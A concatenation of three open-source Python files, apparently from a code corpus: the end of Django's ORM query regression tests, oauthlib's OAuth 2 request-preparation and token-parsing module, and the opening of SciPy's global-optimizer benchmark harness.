channel = Channel.objects.create(identifier=Identifier.objects.create(name='channel'))
channel.programs.add(program)
# channel contains 'program1', so all Identifiers except that one
# should be returned
self.assertQuerysetEqual(
Identifier.objects.exclude(program__channel=channel).order_by('name'),
['<Identifier: channel>', '<Identifier: extra>']
)
self.assertQuerysetEqual(
Identifier.objects.exclude(program__channel=None).order_by('name'),
['<Identifier: program>']
)
def test_ticket_12823(self):
pg3 = Page.objects.create(text='pg3')
pg2 = Page.objects.create(text='pg2')
pg1 = Page.objects.create(text='pg1')
pa1 = Paragraph.objects.create(text='pa1')
pa1.page = [pg1, pg2]
pa2 = Paragraph.objects.create(text='pa2')
pa2.page = [pg2, pg3]
pa3 = Paragraph.objects.create(text='pa3')
ch1 = Chapter.objects.create(title='ch1', paragraph=pa1)
ch2 = Chapter.objects.create(title='ch2', paragraph=pa2)
ch3 = Chapter.objects.create(title='ch3', paragraph=pa3)
b1 = Book.objects.create(title='b1', chapter=ch1)
b2 = Book.objects.create(title='b2', chapter=ch2)
b3 = Book.objects.create(title='b3', chapter=ch3)
q = Book.objects.exclude(chapter__paragraph__page__text='pg1')
self.assertNotIn('IS NOT NULL', str(q.query))
self.assertEqual(len(q), 2)
self.assertNotIn(b1, q)
self.assertIn(b2, q)
self.assertIn(b3, q)
class RelabelCloneTest(TestCase):
def test_ticket_19964(self):
my1 = MyObject.objects.create(data='foo')
my1.parent = my1
my1.save()
my2 = MyObject.objects.create(data='bar', parent=my1)
parents = MyObject.objects.filter(parent=F('id'))
children = MyObject.objects.filter(parent__in=parents).exclude(parent=F('id'))
self.assertEqual(list(parents), [my1])
# Evaluating the children query (which has parents as part of it) does
# not change results for the parents query.
self.assertEqual(list(children), [my2])
self.assertEqual(list(parents), [my1])
class Ticket20101Tests(TestCase):
def test_ticket_20101(self):
"""
Tests QuerySet ORed combining in exclude subquery case.
"""
t = Tag.objects.create(name='foo')
a1 = Annotation.objects.create(tag=t, name='a1')
a2 = Annotation.objects.create(tag=t, name='a2')
a3 = Annotation.objects.create(tag=t, name='a3')
n = Note.objects.create(note='foo', misc='bar')
qs1 = Note.objects.exclude(annotation__in=[a1, a2])
qs2 = Note.objects.filter(annotation__in=[a3])
self.assertIn(n, qs1)
self.assertNotIn(n, qs2)
self.assertIn(n, (qs1 | qs2))
class EmptyStringPromotionTests(TestCase):
def test_empty_string_promotion(self):
qs = RelatedObject.objects.filter(single__name='')
if connection.features.interprets_empty_strings_as_nulls:
self.assertIn('LEFT OUTER JOIN', str(qs.query))
else:
self.assertNotIn('LEFT OUTER JOIN', str(qs.query))
class ValuesSubqueryTests(TestCase):
def test_values_in_subquery(self):
# Check that if a values() queryset is used, then the given values
# will be used instead of forcing use of the relation's field.
o1 = Order.objects.create(id=-2)
o2 = Order.objects.create(id=-1)
oi1 = OrderItem.objects.create(order=o1, status=0)
oi1.status = oi1.pk
oi1.save()
OrderItem.objects.create(order=o2, status=0)
# The query below should match o1 as it has related order_item
# with id == status.
self.assertQuerysetEqual(
Order.objects.filter(items__in=OrderItem.objects.values_list('status')),
[o1.pk], lambda x: x.pk)
class DoubleInSubqueryTests(TestCase):
def test_double_subquery_in(self):
lfa1 = LeafA.objects.create(data='foo')
lfa2 = LeafA.objects.create(data='bar')
lfb1 = LeafB.objects.create(data='lfb1')
lfb2 = LeafB.objects.create(data='lfb2')
Join.objects.create(a=lfa1, b=lfb1)
Join.objects.create(a=lfa2, b=lfb2)
leaf_as = LeafA.objects.filter(data='foo').values_list('pk', flat=True)
joins = Join.objects.filter(a__in=leaf_as).values_list('b__id', flat=True)
qs = LeafB.objects.filter(pk__in=joins)
self.assertQuerysetEqual(
qs, [lfb1], lambda x: x)
class Ticket18785Tests(TestCase):
def test_ticket_18785(self):
# Test join trimming from ticket18785
qs = Item.objects.exclude(
note__isnull=False
).filter(
name='something', creator__extra__isnull=True
).order_by()
self.assertEqual(1, str(qs.query).count('INNER JOIN'))
self.assertEqual(0, str(qs.query).count('OUTER JOIN'))
class Ticket20788Tests(TestCase):
def test_ticket_20788(self):
Paragraph.objects.create()
paragraph = Paragraph.objects.create()
page = paragraph.page.create()
chapter = Chapter.objects.create(paragraph=paragraph)
Book.objects.create(chapter=chapter)
paragraph2 = Paragraph.objects.create()
Page.objects.create()
chapter2 = Chapter.objects.create(paragraph=paragraph2)
book2 = Book.objects.create(chapter=chapter2)
sentences_not_in_pub = Book.objects.exclude(
chapter__paragraph__page=page)
self.assertQuerysetEqual(
sentences_not_in_pub, [book2], lambda x: x)
class Ticket12807Tests(TestCase):
def test_ticket_12807(self):
p1 = Paragraph.objects.create()
p2 = Paragraph.objects.create()
# The ORed condition below should have no effect on the query - the
# ~Q(pk__in=[]) will always be True.
qs = Paragraph.objects.filter((Q(pk=p2.pk) | ~Q(pk__in=[])) & Q(pk=p1.pk))
self.assertQuerysetEqual(qs, [p1], lambda x: x)
class RelatedLookupTypeTests(TestCase):
error = 'Cannot query "%s": Must be "%s" instance.'
@classmethod
def setUpTestData(cls):
cls.oa = ObjectA.objects.create(name="oa")
cls.poa = ProxyObjectA.objects.get(name="oa")
cls.coa = ChildObjectA.objects.create(name="coa")
cls.wrong_type = Order.objects.create(id=cls.oa.pk)
cls.ob = ObjectB.objects.create(name="ob", objecta=cls.oa, num=1)
ProxyObjectB.objects.create(name="pob", objecta=cls.oa, num=2)
cls.pob = ProxyObjectB.objects.all()
ObjectC.objects.create(childobjecta=cls.coa)
def test_wrong_type_lookup(self):
"""
A ValueError is raised when the incorrect object type is passed to a
query lookup.
"""
# Passing incorrect object type
with self.assertRaisesMessage(ValueError,
self.error % (self.wrong_type, ObjectA._meta.object_name)):
ObjectB.objects.get(objecta=self.wrong_type)
with self.assertRaisesMessage(ValueError,
self.error % (self.wrong_type, ObjectA._meta.object_name)):
ObjectB.objects.filter(objecta__in=[self.wrong_type])
with self.assertRaisesMessage(ValueError,
self.error % (self.wrong_type, ObjectA._meta.object_name)):
ObjectB.objects.filter(objecta=self.wrong_type)
with self.assertRaisesMessage(ValueError,
self.error % (self.wrong_type, ObjectB._meta.object_name)):
ObjectA.objects.filter(objectb__in=[self.wrong_type, self.ob])
# Passing an object of the class on which query is done.
with self.assertRaisesMessage(ValueError,
self.error % (self.ob, ObjectA._meta.object_name)):
ObjectB.objects.filter(objecta__in=[self.poa, self.ob])
with self.assertRaisesMessage(ValueError,
self.error % (self.ob, ChildObjectA._meta.object_name)):
ObjectC.objects.exclude(childobjecta__in=[self.coa, self.ob])
def test_wrong_backward_lookup(self):
"""
A ValueError is raised when the incorrect object type is passed to a
query lookup for backward relations.
"""
with self.assertRaisesMessage(ValueError,
self.error % (self.oa, ObjectB._meta.object_name)):
ObjectA.objects.filter(objectb__in=[self.oa, self.ob])
with self.assertRaisesMessage(ValueError,
self.error % (self.oa, ObjectB._meta.object_name)):
ObjectA.objects.exclude(objectb=self.oa)
with self.assertRaisesMessage(ValueError,
self.error % (self.wrong_type, ObjectB._meta.object_name)):
ObjectA.objects.get(objectb=self.wrong_type)
def test_correct_lookup(self):
"""
When passing proxy model objects, child objects, or parent objects,
lookups work fine.
"""
out_a = ['<ObjectA: oa>', ]
out_b = ['<ObjectB: ob>', '<ObjectB: pob>']
out_c = ['<ObjectC: >']
# proxy model objects
self.assertQuerysetEqual(ObjectB.objects.filter(objecta=self.poa).order_by('name'), out_b)
self.assertQuerysetEqual(ObjectA.objects.filter(objectb__in=self.pob).order_by('pk'), out_a * 2)
# child objects
self.assertQuerysetEqual(ObjectB.objects.filter(objecta__in=[self.coa]), [])
self.assertQuerysetEqual(ObjectB.objects.filter(objecta__in=[self.poa, self.coa]).order_by('name'), out_b)
self.assertQuerysetEqual(ObjectB.objects.filter(objecta__in=iter([self.poa, self.coa])).order_by('name'), out_b)
# parent objects
self.assertQuerysetEqual(ObjectC.objects.exclude(childobjecta=self.oa), out_c)
# Test for #23226
with self.assertNumQueries(0):
ObjectB.objects.filter(objecta__in=ObjectA.objects.all())
def test_values_queryset_lookup(self):
"""
#23396 - Ensure ValueQuerySets are not checked for compatibility with the lookup field
"""
self.assertQuerysetEqual(ObjectB.objects.filter(
objecta__in=ObjectB.objects.all().values_list('pk')
).order_by('pk'), ['<ObjectB: ob>', '<ObjectB: pob>'])
class Ticket14056Tests(TestCase):
def test_ticket_14056(self):
s1 = SharedConnection.objects.create(data='s1')
s2 = SharedConnection.objects.create(data='s2')
s3 = SharedConnection.objects.create(data='s3')
PointerA.objects.create(connection=s2)
expected_ordering = (
[s1, s3, s2] if connection.features.nulls_order_largest
else [s2, s1, s3]
)
self.assertQuerysetEqual(
SharedConnection.objects.order_by('-pointera__connection', 'pk'),
expected_ordering, lambda x: x
)
class Ticket20955Tests(TestCase):
def test_ticket_20955(self):
jack = Staff.objects.create(name='jackstaff')
jackstaff = StaffUser.objects.create(staff=jack)
jill = Staff.objects.create(name='jillstaff')
jillstaff = StaffUser.objects.create(staff=jill)
task = Task.objects.create(creator=jackstaff, owner=jillstaff, title="task")
task_get = Task.objects.get(pk=task.pk)
# Load data so that assertNumQueries doesn't complain about the get
# version's queries.
task_get.creator.staffuser.staff
task_get.owner.staffuser.staff
qs = Task.objects.select_related(
'creator__staffuser__staff', 'owner__staffuser__staff')
self.assertEqual(str(qs.query).count(' JOIN '), 6)
task_select_related = qs.get(pk=task.pk)
with self.assertNumQueries(0):
self.assertEqual(task_select_related.creator.staffuser.staff,
task_get.creator.staffuser.staff)
self.assertEqual(task_select_related.owner.staffuser.staff,
task_get.owner.staffuser.staff)
class Ticket21203Tests(TestCase):
def test_ticket_21203(self):
p = Ticket21203Parent.objects.create(parent_bool=True)
c = Ticket21203Child.objects.create(parent=p)
qs = Ticket21203Child.objects.select_related('parent').defer('parent__created')
self.assertQuerysetEqual(qs, [c], lambda x: x)
self.assertIs(qs[0].parent.parent_bool, True)
class ValuesJoinPromotionTests(TestCase):
def test_values_no_promotion_for_existing(self):
qs = Node.objects.filter(parent__parent__isnull=False)
self.assertIn(' INNER JOIN ', str(qs.query))
qs = qs.values('parent__parent__id')
self.assertIn(' INNER JOIN ', str(qs.query))
# Make sure there is a left outer join without the filter.
qs = Node.objects.values('parent__parent__id')
self.assertIn(' LEFT OUTER JOIN ', str(qs.query))
def test_non_nullable_fk_not_promoted(self):
qs = ObjectB.objects.values('objecta__name')
self.assertIn(' INNER JOIN ', str(qs.query))
def test_ticket_21376(self):
a = ObjectA.objects.create()
ObjectC.objects.create(objecta=a)
qs = ObjectC.objects.filter(
Q(objecta=a) | Q(objectb__objecta=a),
)
qs = qs.filter(
Q(objectb=1) | Q(objecta=a),
)
self.assertEqual(qs.count(), 1)
tblname = connection.ops.quote_name(ObjectB._meta.db_table)
self.assertIn(' LEFT OUTER JOIN %s' % tblname, str(qs.query))
class ForeignKeyToBaseExcludeTests(TestCase):
def test_ticket_21787(self):
sc1 = SpecialCategory.objects.create(special_name='sc1', name='sc1')
sc2 = SpecialCategory.objects.create(special_name='sc2', name='sc2')
sc3 = SpecialCategory.objects.create(special_name='sc3', name='sc3')
c1 = CategoryItem.objects.create(category=sc1)
CategoryItem.objects.create(category=sc2)
self.assertQuerysetEqual(
SpecialCategory.objects.exclude(
categoryitem__id=c1.pk).order_by('name'),
[sc2, sc3], lambda x: x
)
self.assertQuerysetEqual(
SpecialCategory.objects.filter(categoryitem__id=c1.pk),
[sc1], lambda x: x
)
class ReverseM2MCustomPkTests(TestCase):
def test_ticket_21879(self):
cpt1 = CustomPkTag.objects.create(id='cpt1', tag='cpt1')
cp1 = CustomPk.objects.create(name='cp1', extra='extra')
cp1.custompktag_set.add(cpt1)
self.assertQuerysetEqual(
CustomPk.objects.filter(custompktag=cpt1), [cp1],
lambda x: x)
self.assertQuerysetEqual(
CustomPkTag.objects.filter(custom_pk=cp1), [cpt1],
lambda x: x)
class Ticket22429Tests(TestCase):
def test_ticket_22429(self):
sc1 = School.objects.create()
st1 = Student.objects.create(school=sc1)
sc2 = School.objects.create()
st2 = Student.objects.create(school=sc2)
cr = Classroom.objects.create(school=sc1)
cr.students.add(st1)
queryset = Student.objects.filter(~Q(classroom__school=F('school')))
self.assertQuerysetEqual(queryset, [st2], lambda x: x)
class Ticket23605Tests(TestCase):
def test_ticket_23605(self):
# Test filtering on a complicated q-object from ticket's report.
# The query structure is such that we have multiple nested subqueries.
# The original problem was that the inner queries weren't relabeled
# correctly.
a1 = Ticket23605A.objects.create()
a2 = Ticket23605A.objects.create()
c1 = Ticket23605C.objects.create(field_c0=10000.0)
Ticket23605B.objects.create(
field_b0=10000.0, field_b1=True,
modelc_fk=c1, modela_fk=a1)
complex_q = Q(pk__in=Ticket23605A.objects.filter(
Q(
# True for a1 as field_b0 = 10000, field_c0=10000
# False for a2 as no ticket23605b found
ticket23605b__field_b0__gte=1000000 /
F("ticket23605b__modelc_fk__field_c0")
) &
# True for a1 (field_b1=True)
Q(ticket23605b__field_b1=True) &
~Q(ticket23605b__pk__in=Ticket23605B.objects.filter(
~(
# Same filters as above commented filters, but
# double-negated (one for Q() above, one for
# parentheses). So, again a1 match, a2 not.
Q(field_b1=True) &
Q(field_b0__gte=1000000 / F("modelc_fk__field_c0"))
)
))).filter(ticket23605b__field_b1=True))
qs1 = Ticket23605A.objects.filter(complex_q)
self.assertQuerysetEqual(qs1, [a1], lambda x: x)
qs2 = Ticket23605A.objects.exclude(complex_q)
self.assertQuerysetEqual(qs2, [a2], lambda x: x)
class TestTicket24279(TestCase):
def test_ticket_24278(self):
School.objects.create()
qs = School.objects.filter(Q(pk__in=()) | Q())
self.assertQuerysetEqual(qs, [])
class TestInvalidValuesRelation(TestCase):
def test_invalid_values(self):
with self.assertRaises(ValueError):
Annotation.objects.filter(tag='abc')
with self.assertRaises(ValueError):
Annotation.objects.filter(tag__in=[123, 'abc'])
class TestTicket24605(TestCase):
def test_ticket_24605(self):
"""
Subquery table names should be quoted.
"""
i1 = Individual.objects.create(alive=True)
RelatedIndividual.objects.create(related=i1)
i2 = Individual.objects.create(alive=False)
RelatedIndividual.objects.create(related=i2)
i3 = Individual.objects.create(alive=True)
i4 = Individual.objects.create(alive=False)
self.assertQuerysetEqual(
Individual.objects.filter(Q(alive=False), Q(related_individual__isnull=True)),
[i4], lambda x: x
)
self.assertQuerysetEqual(
Individual.objects.exclude(
Q(alive=False), Q(related_individual__isnull=True)
).order_by('pk'),
[i1, i2, i3], lambda x: x
)
| bsd-3-clause |
rjhunter8285/nsc-cloudproject-s22016 | api/FlaskApp/FlaskApp/python_modules/oauthlib/oauth2/rfc6749/parameters.py | 86 | 15901 | # -*- coding: utf-8 -*-
"""
oauthlib.oauth2.rfc6749.parameters
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This module contains methods related to `Section 4`_ of the OAuth 2 RFC.
.. _`Section 4`: http://tools.ietf.org/html/rfc6749#section-4
"""
from __future__ import absolute_import, unicode_literals
import json
import os
import time
try:
import urlparse
except ImportError:
import urllib.parse as urlparse
from oauthlib.common import add_params_to_uri, add_params_to_qs, unicode_type
from oauthlib.signals import scope_changed
from .errors import raise_from_error, MissingTokenError, MissingTokenTypeError
from .errors import MismatchingStateError, MissingCodeError
from .errors import InsecureTransportError
from .tokens import OAuth2Token
from .utils import list_to_scope, scope_to_list, is_secure_transport
def prepare_grant_uri(uri, client_id, response_type, redirect_uri=None,
scope=None, state=None, **kwargs):
"""Prepare the authorization grant request URI.
The client constructs the request URI by adding the following
parameters to the query component of the authorization endpoint URI
using the ``application/x-www-form-urlencoded`` format as defined by
[`W3C.REC-html401-19991224`_]:
:param response_type: To indicate which OAuth 2 grant/flow is required,
"code" and "token".
:param client_id: The client identifier as described in `Section 2.2`_.
:param redirect_uri: The client provided URI to redirect back to after
authorization as described in `Section 3.1.2`_.
:param scope: The scope of the access request as described by
`Section 3.3`_.
:param state: An opaque value used by the client to maintain
state between the request and callback. The authorization
server includes this value when redirecting the user-agent
back to the client. The parameter SHOULD be used for
preventing cross-site request forgery as described in
`Section 10.12`_.
:param kwargs: Extra arguments to embed in the grant/authorization URL.
An example of an authorization code grant authorization URL:
.. code-block:: http
GET /authorize?response_type=code&client_id=s6BhdRkqt3&state=xyz
&redirect_uri=https%3A%2F%2Fclient%2Eexample%2Ecom%2Fcb HTTP/1.1
Host: server.example.com
.. _`W3C.REC-html401-19991224`: http://tools.ietf.org/html/rfc6749#ref-W3C.REC-html401-19991224
.. _`Section 2.2`: http://tools.ietf.org/html/rfc6749#section-2.2
.. _`Section 3.1.2`: http://tools.ietf.org/html/rfc6749#section-3.1.2
.. _`Section 3.3`: http://tools.ietf.org/html/rfc6749#section-3.3
.. _`section 10.12`: http://tools.ietf.org/html/rfc6749#section-10.12
"""
if not is_secure_transport(uri):
raise InsecureTransportError()
params = [(('response_type', response_type)),
(('client_id', client_id))]
if redirect_uri:
params.append(('redirect_uri', redirect_uri))
if scope:
params.append(('scope', list_to_scope(scope)))
if state:
params.append(('state', state))
for k in kwargs:
if kwargs[k]:
params.append((unicode_type(k), kwargs[k]))
return add_params_to_uri(uri, params)
def prepare_token_request(grant_type, body='', **kwargs):
"""Prepare the access token request.
The client makes a request to the token endpoint by adding the
following parameters using the ``application/x-www-form-urlencoded``
format in the HTTP request entity-body:
:param grant_type: To indicate grant type being used, i.e. "password",
"authorization_code" or "client_credentials".
:param body: Existing request body to embed parameters in.
:param code: If using authorization code grant, pass the previously
obtained authorization code as the ``code`` argument.
:param redirect_uri: If the "redirect_uri" parameter was included in the
authorization request as described in
`Section 4.1.1`_, and their values MUST be identical.
:param kwargs: Extra arguments to embed in the request body.
An example of an authorization code token request body:
.. code-block:: http
grant_type=authorization_code&code=SplxlOBeZQQYbYS6WxSbIA
&redirect_uri=https%3A%2F%2Fclient%2Eexample%2Ecom%2Fcb
.. _`Section 4.1.1`: http://tools.ietf.org/html/rfc6749#section-4.1.1
"""
params = [('grant_type', grant_type)]
if 'scope' in kwargs:
kwargs['scope'] = list_to_scope(kwargs['scope'])
for k in kwargs:
if kwargs[k]:
params.append((unicode_type(k), kwargs[k]))
return add_params_to_qs(body, params)
def prepare_token_revocation_request(url, token, token_type_hint="access_token",
callback=None, body='', **kwargs):
"""Prepare a token revocation request.
The client constructs the request by including the following parameters
using the "application/x-www-form-urlencoded" format in the HTTP request
entity-body:
token REQUIRED. The token that the client wants to get revoked.
token_type_hint OPTIONAL. A hint about the type of the token submitted
for revocation. Clients MAY pass this parameter in order to help the
authorization server to optimize the token lookup. If the server is unable
to locate the token using the given hint, it MUST extend its search across
all of its supported token types. An authorization server MAY ignore this
parameter, particularly if it is able to detect the token type
automatically. This specification defines two such values:
* access_token: An access token as defined in [RFC6749],
`Section 1.4`_
* refresh_token: A refresh token as defined in [RFC6749],
`Section 1.5`_
Specific implementations, profiles, and extensions of this
specification MAY define other values for this parameter using the
registry defined in `Section 4.1.2`_.
.. _`Section 1.4`: http://tools.ietf.org/html/rfc6749#section-1.4
.. _`Section 1.5`: http://tools.ietf.org/html/rfc6749#section-1.5
.. _`Section 4.1.2`: http://tools.ietf.org/html/rfc7009#section-4.1.2
"""
if not is_secure_transport(url):
raise InsecureTransportError()
params = [('token', token)]
if token_type_hint:
params.append(('token_type_hint', token_type_hint))
for k in kwargs:
if kwargs[k]:
params.append((unicode_type(k), kwargs[k]))
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
if callback:
params.append(('callback', callback))
return add_params_to_uri(url, params), headers, body
else:
return url, headers, add_params_to_qs(body, params)
def parse_authorization_code_response(uri, state=None):
"""Parse authorization grant response URI into a dict.
If the resource owner grants the access request, the authorization
server issues an authorization code and delivers it to the client by
adding the following parameters to the query component of the
redirection URI using the ``application/x-www-form-urlencoded`` format:
**code**
REQUIRED. The authorization code generated by the
authorization server. The authorization code MUST expire
shortly after it is issued to mitigate the risk of leaks. A
maximum authorization code lifetime of 10 minutes is
RECOMMENDED. The client MUST NOT use the authorization code
more than once. If an authorization code is used more than
once, the authorization server MUST deny the request and SHOULD
revoke (when possible) all tokens previously issued based on
that authorization code. The authorization code is bound to
the client identifier and redirection URI.
**state**
REQUIRED if the "state" parameter was present in the client
authorization request. The exact value received from the
client.
:param uri: The full redirect URL back to the client.
:param state: The state parameter from the authorization request.
For example, the authorization server redirects the user-agent by
sending the following HTTP response:
.. code-block:: http
HTTP/1.1 302 Found
Location: https://client.example.com/cb?code=SplxlOBeZQQYbYS6WxSbIA
&state=xyz
"""
if not is_secure_transport(uri):
raise InsecureTransportError()
query = urlparse.urlparse(uri).query
params = dict(urlparse.parse_qsl(query))
if not 'code' in params:
raise MissingCodeError("Missing code parameter in response.")
if state and params.get('state', None) != state:
raise MismatchingStateError()
return params
def parse_implicit_response(uri, state=None, scope=None):
"""Parse the implicit token response URI into a dict.
If the resource owner grants the access request, the authorization
server issues an access token and delivers it to the client by adding
the following parameters to the fragment component of the redirection
URI using the ``application/x-www-form-urlencoded`` format:
**access_token**
REQUIRED. The access token issued by the authorization server.
**token_type**
REQUIRED. The type of the token issued as described in
Section 7.1. Value is case insensitive.
**expires_in**
RECOMMENDED. The lifetime in seconds of the access token. For
example, the value "3600" denotes that the access token will
expire in one hour from the time the response was generated.
If omitted, the authorization server SHOULD provide the
expiration time via other means or document the default value.
**scope**
OPTIONAL, if identical to the scope requested by the client,
otherwise REQUIRED. The scope of the access token as described
by Section 3.3.
**state**
REQUIRED if the "state" parameter was present in the client
authorization request. The exact value received from the
client.
Similar to the authorization code response, but with a full token provided
in the URL fragment:
.. code-block:: http
HTTP/1.1 302 Found
Location: http://example.com/cb#access_token=2YotnFZFEjr1zCsicMWpAA
&state=xyz&token_type=example&expires_in=3600
"""
if not is_secure_transport(uri):
raise InsecureTransportError()
fragment = urlparse.urlparse(uri).fragment
params = dict(urlparse.parse_qsl(fragment, keep_blank_values=True))
if 'scope' in params:
params['scope'] = scope_to_list(params['scope'])
if 'expires_in' in params:
params['expires_at'] = time.time() + int(params['expires_in'])
if state and params.get('state', None) != state:
raise ValueError("Mismatching or missing state in params.")
params = OAuth2Token(params, old_scope=scope)
validate_token_parameters(params)
return params
def parse_token_response(body, scope=None):
"""Parse the JSON token response body into a dict.
The authorization server issues an access token and optional refresh
token, and constructs the response by adding the following parameters
to the entity body of the HTTP response with a 200 (OK) status code:
access_token
REQUIRED. The access token issued by the authorization server.
token_type
REQUIRED. The type of the token issued as described in
`Section 7.1`_. Value is case insensitive.
expires_in
RECOMMENDED. The lifetime in seconds of the access token. For
example, the value "3600" denotes that the access token will
expire in one hour from the time the response was generated.
If omitted, the authorization server SHOULD provide the
expiration time via other means or document the default value.
refresh_token
OPTIONAL. The refresh token which can be used to obtain new
access tokens using the same authorization grant as described
in `Section 6`_.
scope
OPTIONAL, if identical to the scope requested by the client,
otherwise REQUIRED. The scope of the access token as described
by `Section 3.3`_.
The parameters are included in the entity body of the HTTP response
using the "application/json" media type as defined by [`RFC4627`_]. The
parameters are serialized into a JSON structure by adding each
parameter at the highest structure level. Parameter names and string
values are included as JSON strings. Numerical values are included
as JSON numbers. The order of parameters does not matter and can
vary.
:param body: The full json encoded response body.
:param scope: The scope requested during authorization.
For example:
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
Cache-Control: no-store
Pragma: no-cache
{
"access_token":"2YotnFZFEjr1zCsicMWpAA",
"token_type":"example",
"expires_in":3600,
"refresh_token":"tGzv3JOkF0XG5Qx2TlKWIA",
"example_parameter":"example_value"
}
.. _`Section 7.1`: http://tools.ietf.org/html/rfc6749#section-7.1
.. _`Section 6`: http://tools.ietf.org/html/rfc6749#section-6
.. _`Section 3.3`: http://tools.ietf.org/html/rfc6749#section-3.3
.. _`RFC4627`: http://tools.ietf.org/html/rfc4627
"""
try:
params = json.loads(body)
except ValueError:
# Fall back to URL-encoded string, to support old implementations,
# including (at time of writing) Facebook. See:
# https://github.com/idan/oauthlib/issues/267
params = dict(urlparse.parse_qsl(body))
for key in ('expires_in', 'expires'):
if key in params: # cast a couple things to int
params[key] = int(params[key])
if 'scope' in params:
params['scope'] = scope_to_list(params['scope'])
if 'expires' in params:
params['expires_in'] = params.pop('expires')
if 'expires_in' in params:
params['expires_at'] = time.time() + int(params['expires_in'])
params = OAuth2Token(params, old_scope=scope)
validate_token_parameters(params)
return params
def validate_token_parameters(params):
"""Ensures token precence, token type, expiration and scope in params."""
if 'error' in params:
raise_from_error(params.get('error'), params)
if not 'access_token' in params:
raise MissingTokenError(description="Missing access token parameter.")
if not 'token_type' in params:
if os.environ.get('OAUTHLIB_STRICT_TOKEN_TYPE'):
raise MissingTokenTypeError()
# If the issued access token scope is different from the one requested by
# the client, the authorization server MUST include the "scope" response
# parameter to inform the client of the actual scope granted.
# http://tools.ietf.org/html/rfc6749#section-3.3
if params.scope_changed:
message = 'Scope has changed from "{old}" to "{new}".'.format(
old=params.old_scope, new=params.scope,
)
scope_changed.send(message=message, old=params.old_scopes, new=params.scopes)
if not os.environ.get('OAUTHLIB_RELAX_TOKEN_SCOPE', None):
w = Warning(message)
w.token = params
w.old_scope = params.old_scopes
w.new_scope = params.scopes
raise w
| apache-2.0 |
aarchiba/scipy | benchmarks/benchmarks/optimize.py | 4 | 19341 | from __future__ import division, print_function, absolute_import
import os
import time
import inspect
import json
import traceback
from collections import defaultdict, OrderedDict
import numpy as np
try:
import scipy.optimize
from scipy.optimize.optimize import rosen, rosen_der, rosen_hess
from scipy.optimize import (leastsq, basinhopping, differential_evolution,
dual_annealing, OptimizeResult)
except ImportError:
pass
from . import test_functions as funcs
from . import go_benchmark_functions as gbf
from .common import Benchmark
from .lsq_problems import extract_lsq_problems
class _BenchOptimizers(Benchmark):
"""a framework for benchmarking the optimizer
Parameters
----------
function_name : string
fun : callable
der : callable
function that returns the derivative (jacobian, gradient) of fun
hess : callable
function that returns the hessian of fun
minimizer_kwargs : kwargs
additional keywords passed to the minimizer. e.g. tol, maxiter
"""
def __init__(self, function_name, fun, der=None, hess=None,
**minimizer_kwargs):
self.function_name = function_name
self.fun = fun
self.der = der
self.hess = hess
self.minimizer_kwargs = minimizer_kwargs
if "tol" not in minimizer_kwargs:
minimizer_kwargs["tol"] = 1e-4
self.results = []
@classmethod
def from_funcobj(cls, function_name, function, **minimizer_kwargs):
self = cls.__new__(cls)
self.function_name = function_name
self.function = function
self.fun = function.fun
if hasattr(function, 'der'):
self.der = function.der
self.bounds = function.bounds
self.minimizer_kwargs = minimizer_kwargs
self.results = []
return self
def reset(self):
self.results = []
def energy_gradient(self, x):
return self.fun(x), self.function.der(x)
def add_result(self, result, t, name):
"""add a result to the list"""
result.time = t
result.name = name
if not hasattr(result, "njev"):
result.njev = 0
if not hasattr(result, "nhev"):
result.nhev = 0
self.results.append(result)
def print_results(self):
"""print the current list of results"""
results = self.average_results()
results = sorted(results, key=lambda x: (x.nfail, x.mean_time))
if not results:
return
print("")
print("=========================================================")
print("Optimizer benchmark: %s" % (self.function_name))
print("dimensions: %d, extra kwargs: %s" % (results[0].ndim, str(self.minimizer_kwargs)))
print("averaged over %d starting configurations" % (results[0].ntrials))
print(" Optimizer nfail nfev njev nhev time")
print("---------------------------------------------------------")
for res in results:
print("%11s | %4d | %4d | %4d | %4d | %.6g" %
(res.name, res.nfail, res.mean_nfev, res.mean_njev, res.mean_nhev, res.mean_time))
def average_results(self):
"""group the results by minimizer and average over the runs"""
grouped_results = defaultdict(list)
for res in self.results:
grouped_results[res.name].append(res)
averaged_results = dict()
for name, result_list in grouped_results.items():
newres = scipy.optimize.OptimizeResult()
newres.name = name
newres.mean_nfev = np.mean([r.nfev for r in result_list])
newres.mean_njev = np.mean([r.njev for r in result_list])
newres.mean_nhev = np.mean([r.nhev for r in result_list])
newres.mean_time = np.mean([r.time for r in result_list])
newres.ntrials = len(result_list)
newres.nfail = len([r for r in result_list if not r.success])
newres.nsuccess = len([r for r in result_list if r.success])
try:
newres.ndim = len(result_list[0].x)
except TypeError:
newres.ndim = 1
averaged_results[name] = newres
return averaged_results
# for basinhopping
def accept_test(self, x_new=None, *args, **kwargs):
"""
Does the new candidate vector lie in between the bounds?
Returns
-------
accept_test : bool
The candidate vector lies in between the bounds
"""
if not hasattr(self.function, "xmin"):
return True
if np.any(x_new < self.function.xmin):
return False
if np.any(x_new > self.function.xmax):
return False
return True
def run_basinhopping(self):
"""
Do an optimization run for basinhopping
"""
kwargs = self.minimizer_kwargs
if hasattr(self.fun, "temperature"):
kwargs["T"] = self.function.temperature
if hasattr(self.fun, "stepsize"):
kwargs["stepsize"] = self.function.stepsize
minimizer_kwargs = {"method": "L-BFGS-B"}
x0 = self.function.initial_vector()
# basinhopping - no gradient
minimizer_kwargs['jac'] = False
self.function.nfev = 0
t0 = time.time()
res = basinhopping(
self.fun, x0, accept_test=self.accept_test,
minimizer_kwargs=minimizer_kwargs,
**kwargs)
t1 = time.time()
res.success = self.function.success(res.x)
res.nfev = self.function.nfev
self.add_result(res, t1 - t0, 'basinh.')
def run_differentialevolution(self):
"""
Do an optimization run for differential_evolution
"""
self.function.nfev = 0
t0 = time.time()
res = differential_evolution(self.fun,
self.bounds,
popsize=20)
t1 = time.time()
res.success = self.function.success(res.x)
res.nfev = self.function.nfev
self.add_result(res, t1 - t0, 'DE')
def run_dualannealing(self):
"""
Do an optimization run for dual_annealing
"""
self.function.nfev = 0
t0 = time.time()
res = dual_annealing(self.fun,
None,
self.bounds)
t1 = time.time()
res.success = self.function.success(res.x)
res.nfev = self.function.nfev
self.add_result(res, t1 - t0, 'DA')
def bench_run_global(self, numtrials=50, methods=None):
"""
Run the optimization tests for the required minimizers.
"""
if methods is None:
methods = ['DE', 'basinh.', 'DA']
method_fun = {'DE': self.run_differentialevolution,
'basinh.': self.run_basinhopping,
'DA': self.run_dualannealing,}
for i in range(numtrials):
for m in methods:
method_fun[m]()
